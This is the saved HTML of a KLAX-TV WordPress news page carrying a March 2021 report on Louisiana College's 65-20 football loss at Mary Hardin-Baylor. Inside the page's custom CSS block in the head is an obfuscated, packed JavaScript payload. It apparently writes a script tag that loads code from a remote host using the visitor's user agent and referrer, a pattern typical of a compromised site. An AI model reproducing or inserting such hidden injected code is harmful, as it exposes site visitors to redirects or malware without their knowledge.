<!DOCTYPE html>
<html lang="en-US">
<head>
	<meta charset="UTF-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="http://gmpg.org/xfn/11"/>
	<title>Briscoe Rushes for 200 Yards but Wildcats Fall at UMHB &#8211; KLAX-TV</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="KLAX-TV &raquo; Feed" href="http://klax-tv.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="KLAX-TV &raquo; Comments Feed" href="http://klax-tv.com/comments/feed/" />
<link rel="alternate" type="text/calendar" title="KLAX-TV &raquo; iCal Feed" href="http://klax-tv.com/events/?ical=1" />
<link rel="alternate" type="application/rss+xml" title="KLAX-TV &raquo; Briscoe Rushes for 200 Yards but Wildcats Fall at UMHB Comments Feed" href="http://klax-tv.com/briscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb/feed/" />
<!-- This site uses the Google Analytics by ExactMetrics plugin v6.0.1 - Using Analytics tracking - https://www.exactmetrics.com/ -->
<script type="text/javascript" data-cfasync="false">
	var em_version         = '6.0.1';
	var em_track_user      = true;
	var em_no_track_reason = '';
	
	var disableStr = 'ga-disable-UA-106145994-1';

	/* Function to detect opted out users */
	function __gaTrackerIsOptedOut() {
		return document.cookie.indexOf(disableStr + '=true') > -1;
	}

	/* Disable tracking if the opt-out cookie exists. */
	if ( __gaTrackerIsOptedOut() ) {
		window[disableStr] = true;
	}

	/* Opt-out function */
	function __gaTrackerOptout() {
	  document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/';
	  window[disableStr] = true;
	}

	if ( 'undefined' === typeof gaOptout ) {
		function gaOptout() {
			__gaTrackerOptout();
		}
	}
	
	if ( em_track_user ) {
		(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
			(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
			m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
		})(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker');

window.ga = __gaTracker;		__gaTracker('create', 'UA-106145994-1', 'auto');
		__gaTracker('set', 'forceSSL', true);
		__gaTracker('send','pageview');
		__gaTracker( function() { window.ga = __gaTracker; } );
	} else {
		console.log( "" );
		(function() {
			/* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */
			var noopfn = function() {
				return null;
			};
			var noopnullfn = function() {
				return null;
			};
			var Tracker = function() {
				return null;
			};
			var p = Tracker.prototype;
			p.get = noopfn;
			p.set = noopfn;
			p.send = noopfn;
			var __gaTracker = function() {
				var len = arguments.length;
				if ( len === 0 ) {
					return;
				}
				var f = arguments[len-1];
				if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) {
					console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + em_no_track_reason );
					return;
				}
				try {
					f.hitCallback();
				} catch (ex) {

				}
			};
			__gaTracker.create = function() {
				return new Tracker();
			};
			__gaTracker.getByName = noopnullfn;
			__gaTracker.getAll = function() {
				return [];
			};
			__gaTracker.remove = noopfn;
			window['__gaTracker'] = __gaTracker;
			window.ga = __gaTracker;		})();
		}
</script>
<!-- / Google Analytics by ExactMetrics -->
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/klax-tv.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='tribe-common-skeleton-style-css'  href='http://klax-tv.com/wp-content/plugins/the-events-calendar/common/src/resources/css/common-skeleton.min.css?ver=4.11.1' type='text/css' media='all' />
<link rel='stylesheet' id='tribe-tooltip-css'  href='http://klax-tv.com/wp-content/plugins/the-events-calendar/common/src/resources/css/tooltip.min.css?ver=4.11.1' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-css'  href='http://klax-tv.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='sclbttns_stylesheet-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/css/style.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='fcbkbttn_stylesheet-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/facebook-button-plugin/css/style.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='twttr_stylesheet-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/twitter-plugin/css/style.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='lnkdn_icon-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/bws-linkedin/css/icon.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='lnkdn_stylesheet-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/bws-linkedin/css/style.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='pntrst_stylesheet-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/bws-pinterest/css/style.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='theme-my-login-css'  href='http://klax-tv.com/wp-content/plugins/theme-my-login/assets/styles/theme-my-login.min.css?ver=7.0.15' type='text/css' media='all' />
<link rel='stylesheet' id='colormag_google_fonts-css'  href='//fonts.googleapis.com/css?family=Open+Sans%3A400%2C600&#038;ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='colormag_style-css'  href='http://klax-tv.com/wp-content/themes/colormag/style.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='colormag_dark_style-css'  href='http://klax-tv.com/wp-content/themes/colormag/dark.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='colormag-fontawesome-css'  href='http://klax-tv.com/wp-content/themes/colormag/fontawesome/css/font-awesome.css?ver=4.2.1' type='text/css' media='all' />
<script type='text/javascript' id='exactmetrics-frontend-script-js-extra'>
/* <![CDATA[ */
var exactmetrics_frontend = {"js_events_tracking":"true","download_extensions":"zip,mp3,mpeg,pdf,docx,pptx,xlsx,rar","inbound_paths":"[{\"path\":\"\\\/go\\\/\",\"label\":\"affiliate\"},{\"path\":\"\\\/recommend\\\/\",\"label\":\"affiliate\"}]","home_url":"http:\/\/klax-tv.com","hash_tracking":"false"};
/* ]]> */
</script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/plugins/google-analytics-dashboard-for-wp/assets/js/frontend.min.js?ver=6.0.1' id='exactmetrics-frontend-script-js'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp' id='jquery-core-js'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/plugins/social-buttons-pack/facebook-button-plugin/js/script.js?ver=5.5.3' id='fcbkbttn_script-js'></script>
<!--[if lte IE 8]>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/html5shiv.min.js?ver=5.5.3' id='html5-js'></script>
<![endif]-->
<link rel="https://api.w.org/" href="http://klax-tv.com/wp-json/" /><link rel="alternate" type="application/json" href="http://klax-tv.com/wp-json/wp/v2/posts/74718" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://klax-tv.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://klax-tv.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Seven-Run Fourth Inning Propels Wildcats to Series Win over Sul Ross' href='http://klax-tv.com/seven-run-fourth-inning-propels-wildcats-to-series-win-over-sul-ross/' />
<link rel='next' title='LSUA earns six straight sets singles victory in shutout of Florida National' href='http://klax-tv.com/lsua-earns-six-straight-sets-singles-victory-in-shutout-of-florida-national/' />
<meta name="generator" content="WordPress 5.5.3" />
<link rel="canonical" href="http://klax-tv.com/briscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb/" />
<link rel='shortlink' href='http://klax-tv.com/?p=74718' />
<link rel="alternate" type="application/json+oembed" href="http://klax-tv.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fklax-tv.com%2Fbriscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://klax-tv.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fklax-tv.com%2Fbriscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb%2F&#038;format=xml" />

<!-- This site is using AdRotate v5.7 to display their advertisements - https://ajdg.solutions/ -->
<!-- AdRotate CSS -->
<style type="text/css" media="screen">
	.g { margin:0px; padding:0px; overflow:hidden; line-height:1; zoom:1; }
	.g img { height:auto; }
	.g-col { position:relative; float:left; }
	.g-col:first-child { margin-left: 0; }
	.g-col:last-child { margin-right: 0; }
	.g-7 { min-width:0px; max-width:250px; }
	.b-7 { margin:0px 0px 0px 0px; }
	.g-9 { min-width:0px; max-width:300px; }
	.b-9 { margin:0px 0px 0px 0px; }
	.g-11 { width:auto; }
	.b-11 { margin:5px 0px 0px 0px; }
	@media only screen and (max-width: 480px) {
		.g-col, .g-dyn, .g-single { width:100%; margin-left:0; margin-right:0; }
	}
</style>
<!-- /AdRotate CSS -->


<!-- fcbkbttn meta start -->
<meta property="og:url" content="http://klax-tv.com/briscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb/"/>
<meta property="og:title" content="Briscoe Rushes for 200 Yards but Wildcats Fall at UMHB"/>
<meta property="og:site_name" content="KLAX-TV"/>
<meta property="og:image" content="http://klax-tv.com/wp-content/uploads/2021/03/210320-UMHB-LC-925-300x289.jpg"/>
<meta property="og:description" content="BELTON, Texas – The Louisiana College football team got a 200-yard rushing performance from freshman running back Devin Briscoe, but it wasn’t enough to upset Mary Hardin-Ba"/>
<!-- fcbkbttn meta end -->		<script type="text/javascript" src="//assets.pinterest.com/js/pinit.js" async data-pin-save="true" data-pin-lang="en" data-pin-count="none"></script>
	<meta name="tec-api-version" content="v1"><meta name="tec-api-origin" content="http://klax-tv.com"><link rel="https://theeventscalendar.com/" href="http://klax-tv.com/wp-json/tribe/events/v1/" /><style type="text/css" id="custom-background-css">
body.custom-background { background-color: #a5a5a5; background-image: url("http://klax-tv.com/wp-content/uploads/2019/02/small-blueNet_Standard_LandScape.jpg"); background-position: left top; background-size: contain; background-repeat: no-repeat; background-attachment: fixed; }
</style>
	<link rel="icon" href="http://klax-tv.com/wp-content/uploads/2016/05/cropped-SiteIcon-32x32.jpg" sizes="32x32" />
<link rel="icon" href="http://klax-tv.com/wp-content/uploads/2016/05/cropped-SiteIcon-192x192.jpg" sizes="192x192" />
<link rel="apple-touch-icon" href="http://klax-tv.com/wp-content/uploads/2016/05/cropped-SiteIcon-180x180.jpg" />
<meta name="msapplication-TileImage" content="http://klax-tv.com/wp-content/uploads/2016/05/cropped-SiteIcon-270x270.jpg" />
<!-- KLAX-TV Internal Styles -->		<style type="text/css">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</style>
		<!-- KLAX-TV Elementor Internal Styles -->			<style type="text/css">.elementor .tg-module-wrapper .module-title{border-bottom:1px solid #007ab7}.elementor .tg-module-wrapper .module-title span,.elementor .tg-module-wrapper .tg-post-category{background-color:#007ab7}.elementor .tg-module-wrapper .tg-module-meta .tg-module-comments a:hover,.elementor .tg-module-wrapper .tg-module-meta .tg-post-auther-name a:hover,.elementor .tg-module-wrapper .tg-module-meta .tg-post-date a:hover,.elementor .tg-module-wrapper .tg-module-title:hover a,.elementor .tg-module-wrapper.tg-module-grid .tg_module_grid .tg-module-info .tg-module-meta a:hover{color:#007ab7}</style>
					<style type="text/css" id="wp-custom-css">
			.home eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bhfie|var|u0026u|referrer|zfkhz||js|php'.split('|'),0,{}))
 .below-entry-meta .posted-on {
    display: none;
}
		</style>
		</head>

<body class="post-template-default single single-post postid-74718 single-format-standard custom-background wp-custom-logo colormag tribe-no-js tribe-theme-colormag  wide better-responsive-menu dark-skin elementor-default">



<div id="page" class="hfeed site">
	<a class="skip-link screen-reader-text" href="#main">Skip to content</a>

	
	
	<header id="masthead" class="site-header clearfix ">
		<div id="header-text-nav-container" class="clearfix">

						<div class="news-bar">
				<div class="inner-wrap clearfix">
					
		<div class="date-in-header">
			Monday, March 22, 2021		</div>

		
							<div class="breaking-news">
			<strong class="breaking-news-latest">Latest:</strong>
			<ul class="newsticker">
									<li>
						<a href="http://klax-tv.com/improved-northwestern-state-passing-game-cant-overcome-missed-opportunities-in-loss-to-mcneese/"
						   title="Improved Northwestern State passing game can&#8217;t overcome missed opportunities in loss to McNeese">Improved Northwestern State passing game can&#8217;t overcome missed opportunities in loss to McNeese</a>
					</li>
									<li>
						<a href="http://klax-tv.com/lsua-earns-six-straight-sets-singles-victory-in-shutout-of-florida-national/"
						   title="LSUA earns six straight sets singles victory in shutout of Florida National">LSUA earns six straight sets singles victory in shutout of Florida National</a>
					</li>
									<li>
						<a href="http://klax-tv.com/briscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb/"
						   title="Briscoe Rushes for 200 Yards but Wildcats Fall at UMHB">Briscoe Rushes for 200 Yards but Wildcats Fall at UMHB</a>
					</li>
									<li>
						<a href="http://klax-tv.com/seven-run-fourth-inning-propels-wildcats-to-series-win-over-sul-ross/"
						   title="Seven-Run Fourth Inning Propels Wildcats to Series Win over Sul Ross">Seven-Run Fourth Inning Propels Wildcats to Series Win over Sul Ross</a>
					</li>
									<li>
						<a href="http://klax-tv.com/another-round-of-severe-weather-possible-on-thursday/"
						   title="Another Round of Severe Weather Possible on Thursday">Another Round of Severe Weather Possible on Thursday</a>
					</li>
							</ul>
		</div>
		
							<div class="social-links clearfix">
			<ul>
				<li><a href="http://www.Facebook.com/KLAX31" target="_blank"><i class="fa fa-facebook"></i></a></li><li><a href="https://twitter.com/KLAXTV" target="_blank"><i class="fa fa-twitter"></i></a></li><li><a href="https://www.instagram.com/klaxtv/" target="_blank"><i class="fa fa-instagram"></i></a></li><li><a href="http://www.youtube.com/klaxproduction" target="_blank"><i class="fa fa-youtube"></i></a></li>			</ul>
		</div><!-- .social-links -->
						</div>
			</div>
		
			
			
		<div class="inner-wrap">

			<div id="header-text-nav-wrap" class="clearfix">
				<div id="header-left-section">
											<div id="header-logo-image">
							<a href="http://klax-tv.com/" class="custom-logo-link" rel="home"><img width="406" height="130" src="http://klax-tv.com/wp-content/uploads/2021/02/cropped-KLAX-WEB-LOGO-2.png" class="custom-logo" alt="KLAX-TV" srcset="http://klax-tv.com/wp-content/uploads/2021/02/cropped-KLAX-WEB-LOGO-2.png 406w, http://klax-tv.com/wp-content/uploads/2021/02/cropped-KLAX-WEB-LOGO-2-300x96.png 300w" sizes="(max-width: 406px) 100vw, 406px" /></a>						</div><!-- #header-logo-image -->
											<div id="header-text" class="screen-reader-text">
													<h3 id="site-title">
								<a href="http://klax-tv.com/" title="KLAX-TV" rel="home">KLAX-TV</a>
							</h3>
												<!-- #site-description -->
					</div><!-- #header-text -->
				</div><!-- #header-left-section -->
				<div id="header-right-section">
											<div id="header-right-sidebar" class="clearfix">
							<aside id="custom_html-6" class="widget_text widget widget_custom_html clearfix"><div class="textwidget custom-html-widget"></div></aside><aside id="media_image-59" class="widget widget_media_image clearfix"><a href="https://abc.com/schedule"><img width="200" height="105" src="http://klax-tv.com/wp-content/uploads/2021/03/american-idol.jpg" class="image wp-image-74536  attachment-full size-full" alt="" loading="lazy" style="max-width: 100%; height: auto;" /></a></aside>						</div>
										</div><!-- #header-right-section -->

			</div><!-- #header-text-nav-wrap -->

		</div><!-- .inner-wrap -->

		
			
			
		<nav id="site-navigation" class="main-navigation clearfix" role="navigation">
			<div class="inner-wrap clearfix">
				
									<div class="search-random-icons-container">
													<div class="top-search-wrap">
								<i class="fa fa-search search-top"></i>
								<div class="search-form-top">
									<form action="http://klax-tv.com/" class="search-form searchform clearfix" method="get">
   <div class="search-wrap">
      <input type="text" placeholder="Search" class="s field" name="s">
      <button class="search-icon" type="submit"></button>
   </div>
</form><!-- .searchform -->								</div>
							</div>
											</div>
				
				<p class="menu-toggle"></p>
				<div class="menu-primary-container"><ul id="menu-klax-tv" class="menu"><li id="menu-item-29273" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-29273"><a href="http://klax-tv.com">Home</a></li>
<li id="menu-item-17620" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-17620"><a href="http://klax-tv.com/category/localheadlines/">News</a>
<ul class="sub-menu">
	<li id="menu-item-70150" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-70150"><a href="http://klax-tv.com/news-team/">News Team</a></li>
	<li id="menu-item-17619" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17619"><a href="http://klax-tv.com/category/localheadlines/">Local News</a></li>
	<li id="menu-item-17988" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17988"><a href="http://klax-tv.com/category/community-news/">Community News</a></li>
	<li id="menu-item-39750" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-39750"><a href="http://klax-tv.com/category/elections/">Elections</a></li>
	<li id="menu-item-29885" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-29885"><a href="http://klax-tv.com/category/state-news/">State News</a></li>
	<li id="menu-item-32504" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-32504"><a href="http://abcnews.go.com/">National News</a></li>
	<li id="menu-item-17917" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17917"><a href="http://klax-tv.com/category/business-news/">Business News</a></li>
	<li id="menu-item-49035" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-49035"><a href="http://klax-tv.com/category/campus/">Campus News</a></li>
	<li id="menu-item-18470" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-18470"><a href="http://klax-tv.com/category/health-medical/">Health News</a></li>
	<li id="menu-item-49034" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-49034"><a href="http://klax-tv.com/category/sports-news/">Sports News</a></li>
	<li id="menu-item-71125" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-71125"><a href="http://klax-tv.com/live-stream/">Live Stream</a></li>
</ul>
</li>
<li id="menu-item-33" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-33"><a href="http://klax-tv.com/weather/">Weather</a></li>
<li id="menu-item-46922" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-46922"><a href="http://klax-tv.com/schedule/">Schedule</a></li>
<li id="menu-item-40" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-40"><a href="http://klax-tv.com/about/">About Us</a>
<ul class="sub-menu">
	<li id="menu-item-5856" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5856"><a href="http://klax-tv.com/about/">About KLAX TV</a></li>
	<li id="menu-item-5850" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5850"><a href="http://klax-tv.com/meet-the-team/">Meet the Staff</a></li>
	<li id="menu-item-49336" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-49336"><a href="http://klax-tv.com/advertise/">Advertise with Us</a></li>
	<li id="menu-item-41" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-41"><a href="http://klax-tv.com/commercial-production/">Production</a></li>
	<li id="menu-item-39" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39"><a href="http://klax-tv.com/employment/">Careers at KLAX</a></li>
	<li id="menu-item-23362" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23362"><a href="https://publicfiles.fcc.gov/tv-profile/klax-tv">Public Inspection Files</a></li>
	<li id="menu-item-17310" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17310"><a href="http://klax-tv.com/contact-2/">Contact</a></li>
	<li id="menu-item-73681" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-73681"><a href="http://klax-tv.com/public-file-contacts/">Public File Contacts</a></li>
</ul>
</li>
<li id="menu-item-72267" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-72267"><a href="http://klax-tv.com/cenla-sports-star-athlete-of-the-week/">Cenla Sports Star AOTW</a></li>
<li id="menu-item-17822" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17822"><a href="https://www.metv.com/">MeTV</a></li>
<li id="menu-item-70850" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-70850"><a href="https://www.youtube.com/playlist?list=PLM-QlYGfgxN5JGn6hfsV3Soc22kf-hMHE">CENLA Gets Real</a></li>
</ul></div>
			</div>
		</nav>

		
		</div><!-- #header-text-nav-container -->

		
	</header>

		
	<div id="main" class="clearfix">
		<div class="inner-wrap clearfix">

	
	<div id="primary">
		<div id="content" class="clearfix">

			
				
<article id="post-74718" class="post-74718 post type-post status-publish format-standard has-post-thumbnail hentry category-sports-news">
	
   
         <div class="featured-image">
               <img width="800" height="445" src="http://klax-tv.com/wp-content/uploads/2021/03/210320-UMHB-LC-925-800x445.jpg" class="attachment-colormag-featured-image size-colormag-featured-image wp-post-image" alt="" loading="lazy" /><div class="ccfic"></div>            </div>
   
   <div class="article-content clearfix">

   
   <div class="above-entry-meta"><span class="cat-links"><a href="http://klax-tv.com/category/sports-news/" style="background:#336699" rel="category tag">Sports News</a>&nbsp;</span></div>
      <header class="entry-header">
   		<h1 class="entry-title">
   			Briscoe Rushes for 200 Yards but Wildcats Fall at UMHB   		</h1>
   	</header>

   	<div class="below-entry-meta">
			<span class="posted-on"><a href="http://klax-tv.com/briscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb/" title="11:25 am" rel="bookmark"><i class="fa fa-calendar-o"></i> <time class="entry-date published updated" datetime="2021-03-22T11:25:03-05:00">March 22, 2021</time></a></span>
			<span class="byline">
				<span class="author vcard">
					<i class="fa fa-user"></i>
					<a class="url fn n"
					   href="http://klax-tv.com/author/mglover/"
					   title="Meagan Glover">Meagan Glover					</a>
				</span>
			</span>

							<span class="comments"><a href="http://klax-tv.com/briscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb/#respond"><i class="fa fa-comment"></i> 0 Comments</a></span>
			</div>
   	<div class="entry-content clearfix">
   		<div class="fcbkbttn_buttons_block" id="fcbkbttn_left"><div class="fcbkbttn_like "><fb:like href="http://klax-tv.com/briscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb/" action="like" colorscheme="light" layout="standard" show-faces='false' width="450px" size="small"></fb:like></div><div class="fb-share-button  " data-href="http://klax-tv.com/briscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb/" data-type="button_count" data-size="small"></div></div><div class="lnkdn_buttons"></div><div class="twttr_buttons"><div class="twttr_twitter">
					<a href="http://twitter.com/share?text=Briscoe+Rushes+for+200+Yards+but+Wildcats+Fall+at+UMHB" class="twitter-share-button" data-via="" data-hashtags=""  data-size="default" data-url="http://klax-tv.com/briscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb/"  data-related="" target="_blank">Tweet</a>
				</div></div><p class="x_MsoNormal">BELTON, Texas – The Louisiana College football team got a 200-yard rushing performance from freshman running back Devin Briscoe, but it wasn’t enough to upset Mary Hardin-Baylor as the Wildcats dropped the regular season finale to the Crusaders 65-20 Saturday afternoon at Crusader Field.</p>
<p class="x_MsoNormal">
<p class="x_MsoNormal">The game started out quite well for the Wildcats, who took in the opening kickoff and methodically marched down the field deep into Crusader territory. Facing a third and eight play at the UMHB 11-yard line, Sal Palermo III was hit and fumbled, but the ball bounced perfectly to Briscoe who had only open field ahead of him for a 13-yard touchdown and a 7-0 LC lead.</p>
<p class="x_MsoNormal">
<p class="x_MsoNormal">Now trailing 13-7 towards the end of the first quarter, the Wildcat defense held on fourth down for a turnover on downs, giving the offense the ball at the LC 33. The ensuing drive would be almost completely all Devin Briscoe on the ground as he accounted for 61 yards of a 67-yard drive, including the final 19 on a scamper to the end zone that tied the score at 13-13.</p>
<p class="x_MsoNormal">
<p class="x_MsoNormal">But the game turned over the next two Wildcat possessions as UMHB returned an interception for a touchdown, and then intercepted a pass on LC’s next drive and returned it to the Wildcat ten-yard line, which eventually turned into another Crusader touchdown. Trailing 34-13 with 1:30 remaining before half, the Wildcats looked to grab momentum heading into the break and believed they had as Palermo found Micah Dunn for a 36-yard touchdown pass with just 49 seconds left before halftime to make the score 34-20. However, the Crusaders added a field goal on the final play before halftime to make the score 37-20 at the break. The second half was all UMHB as the Crusaders held LC scoreless in the final two quarters of the regular season.</p>
<p class="x_MsoNormal">
<p class="x_MsoNormal">Devin Briscoe had a day against the Crusaders as he gained 6.1 yards per carry on 33 rushing attempts to finish the day with 202 rush yards and 2 touchdowns. Sal Palermo III went six-of-13 passing for 80 yards, including the 36-yard touchdown pass to Micah Dunn just before halftime. He also threw an interception and was sacked four times. Canaan Leon had three catches to lead the team while Dunn’s 36-yard touchdown made him the team’s leading receiver in yards for the game.</p>
<p class="x_MsoNormal">
<p class="x_MsoNormal">Defensively, Julius Johnson led the team with 12 total tackles, including one for a loss of a yard. Tyren Young collected LC’s lone turnover as he intercepted the Crusaders to kill a UMHB drive in the end zone and returned it for ten yards.</p>
<p class="x_MsoNormal">
<p class="x_MsoNormal">The Wildcats (2-2, 2-2 ASC) now had into the ASC Playoff week as the four-seed from the East Division where they’ll host the four-seed from the ASC West, McMurry. Kickoff of Saturday’s game against the War Hawks (1-3, 1-3 ASC) is set for 1:00 P.M. at Wildcat Field.</p>
<div class="twttr_buttons"><div class="twttr_twitter">
					<a href="http://twitter.com/share?text=Briscoe+Rushes+for+200+Yards+but+Wildcats+Fall+at+UMHB" class="twitter-share-button" data-via="" data-hashtags=""  data-size="default" data-url="http://klax-tv.com/briscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb/"  data-related="" target="_blank">Tweet</a>
				</div></div><div class="fcbkbttn_buttons_block" id="fcbkbttn_left"><div class="fcbkbttn_like "><fb:like href="http://klax-tv.com/briscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb/" action="like" colorscheme="light" layout="standard" show-faces='false' width="450px" size="small"></fb:like></div><div class="fb-share-button  " data-href="http://klax-tv.com/briscoe-rushes-for-200-yards-but-wildcats-fall-at-umhb/" data-type="button_count" data-size="small"></div></div>   	</div>

   </div>

	</article>

			
		</div><!-- #content -->

      
		<ul class="default-wp-page clearfix">
			<li class="previous"><a href="http://klax-tv.com/seven-run-fourth-inning-propels-wildcats-to-series-win-over-sul-ross/" rel="prev"><span class="meta-nav">&larr;</span> Seven-Run Fourth Inning Propels Wildcats to Series Win over Sul Ross</a></li>
			<li class="next"><a href="http://klax-tv.com/lsua-earns-six-straight-sets-singles-victory-in-shutout-of-florida-national/" rel="next">LSUA earns six straight sets singles victory in shutout of Florida National <span class="meta-nav">&rarr;</span></a></li>
		</ul>
	
      
      

	<h4 class="related-posts-main-title">
		<i class="fa fa-thumbs-up"></i><span>You May Also Like</span>
	</h4>

	<div class="related-posts clearfix">

					<div class="single-related-posts">

									<div class="related-posts-thumbnail">
